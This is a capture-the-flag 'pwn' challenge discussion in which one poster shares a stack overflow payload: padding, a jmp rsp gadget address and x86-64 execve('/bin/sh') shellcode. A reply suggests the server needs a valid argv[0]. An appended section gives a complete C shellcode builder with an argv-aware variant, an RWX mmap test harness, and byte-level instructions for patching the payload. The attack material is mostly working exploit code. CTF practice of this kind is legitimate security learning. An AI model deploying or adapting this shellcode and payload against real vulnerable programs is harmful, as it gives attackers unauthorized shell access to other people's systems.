Points: 43

Tags: pwn 

Writeups

Rating     Author team
5.0        Epic Leet Team
not rated  nacayoshi00
fr0zenrain, May 1, 2017, 2:27 a.m.

code  = b'Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  # padding up to the saved return address
code += b'\x82\xf7\x45\x00\x00\x00\x00\x00'  # return address 0x45f782, little-endian: jmp esp (rsp) gadget
code += b'\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
# shellcode: jmp/call/pop puts the address of "/bin/sh" in rdi, rsi = rdx = 0 (argv = envp = NULL),
# rax = 0x3b (execve), syscall
No canary and no NX. This code works in my local process test, but when I send it to the server it does not work. Why? Thanks.


kepler, May 1, 2017, 5:09 a.m.

@fr0zenrain, I didn't look into your shellcode, but I had a similar issue: if I put NULL into argv before calling the syscall, it worked on my local box but not on the server. I guess the server might use busybox, which requires argv[0] to be valid.
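As an added example (not code from either poster), here is a small C builder for the same jmp/call/pop execve shellcode. With with_argv = 0 it emits the posted layout, where push rdx / pop rsi leaves rsi = 0, i.e. argv = NULL; with with_argv = 1 it instead pushes argv = {path, NULL} onto the stack and points rsi at it, which is the form to use if the target's /bin/sh inspects argv[0] (busybox-style applet dispatch). The jmp and call displacements are computed from the body length rather than hard-coded, so the argv = NULL output reproduces the posted bytes (eb 0b ... e8 f0 ff ff ff); unlike the posted bytes, the path is NUL-terminated here. The mmap-and-jump in main is only for running the shellcode locally and assumes a Linux x86-64 host; the gadget address and padding from the post are deliberately not part of this builder.

```c
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <sys/mman.h>

/* Build a position-independent x86-64 execve(path, argv, NULL) shellcode.
   Layout:  jmp short L ; <body> ; L: call body ; "path\0"
   The call pushes the address of the path string, which the body pops
   into rdi.  with_argv = 0 reproduces the posted shellcode (argv = NULL);
   with_argv = 1 builds argv = {path, NULL} on the stack first.
   Returns the shellcode length, or 0 if cap is too small. */
size_t build_execve_shellcode(const char *path, int with_argv,
                              uint8_t *out, size_t cap)
{
    uint8_t body[32];
    size_t n = 0;

    body[n++] = 0x5f;                                     /* pop rdi      ; rdi = path */
    body[n++] = 0x48; body[n++] = 0x31; body[n++] = 0xd2; /* xor rdx,rdx  ; envp = NULL */
    if (with_argv) {
        body[n++] = 0x52;                                 /* push rdx     ; argv[1] = NULL */
        body[n++] = 0x57;                                 /* push rdi     ; argv[0] = path */
        body[n++] = 0x48; body[n++] = 0x89; body[n++] = 0xe6; /* mov rsi,rsp ; rsi = argv */
    } else {
        body[n++] = 0x52;                                 /* push rdx */
        body[n++] = 0x5e;                                 /* pop rsi      ; argv = NULL (posted variant) */
    }
    body[n++] = 0x6a; body[n++] = 0x3b;                   /* push 0x3b */
    body[n++] = 0x58;                                     /* pop rax      ; rax = SYS_execve (59) */
    body[n++] = 0x0f; body[n++] = 0x05;                   /* syscall */

    size_t plen = strlen(path) + 1;                       /* keep the NUL terminator */
    size_t total = 2 + n + 5 + plen;                      /* jmp + body + call + path */
    if (total > cap)
        return 0;

    size_t p = 0;
    out[p++] = 0xeb;                                      /* jmp short over the body */
    out[p++] = (uint8_t)n;                                /* rel8 = body length */
    memcpy(out + p, body, n);
    p += n;
    out[p++] = 0xe8;                                      /* call back to the body start */
    int32_t rel = -(int32_t)(n + 5);                      /* measured from the end of the 5-byte call */
    memcpy(out + p, &rel, 4);                             /* little-endian, as the host is x86-64 */
    p += 4;
    memcpy(out + p, path, plen);
    p += plen;
    return p;
}

/* Local test harness: prints the bytes and runs them from an RWX mapping.
   ./a.out      -> argv = NULL variant (the posted one)
   ./a.out argv -> argv = {"/bin/sh", NULL} variant */
int main(int argc, char **argv)
{
    (void)argv;
    uint8_t sc[64];
    size_t len = build_execve_shellcode("/bin/sh", argc > 1, sc, sizeof sc);
    if (len == 0)
        return 1;
    for (size_t i = 0; i < len; i++)
        printf("\\x%02x", sc[i]);
    printf("\n");

    void *mem = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return 1;
    memcpy(mem, sc, len);
    ((void (*)(void))mem)();                              /* does not return on success */
    return 0;
}
```

The argv-aware variant is three bytes longer than the posted one (push rdi and mov rsi,rsp replace pop rsi), so the jmp displacement becomes 0x0e and the call displacement -19 (ed ff ff ff); everything after the saved return address in the posted payload can be swapped for these bytes without touching the padding or the gadget address.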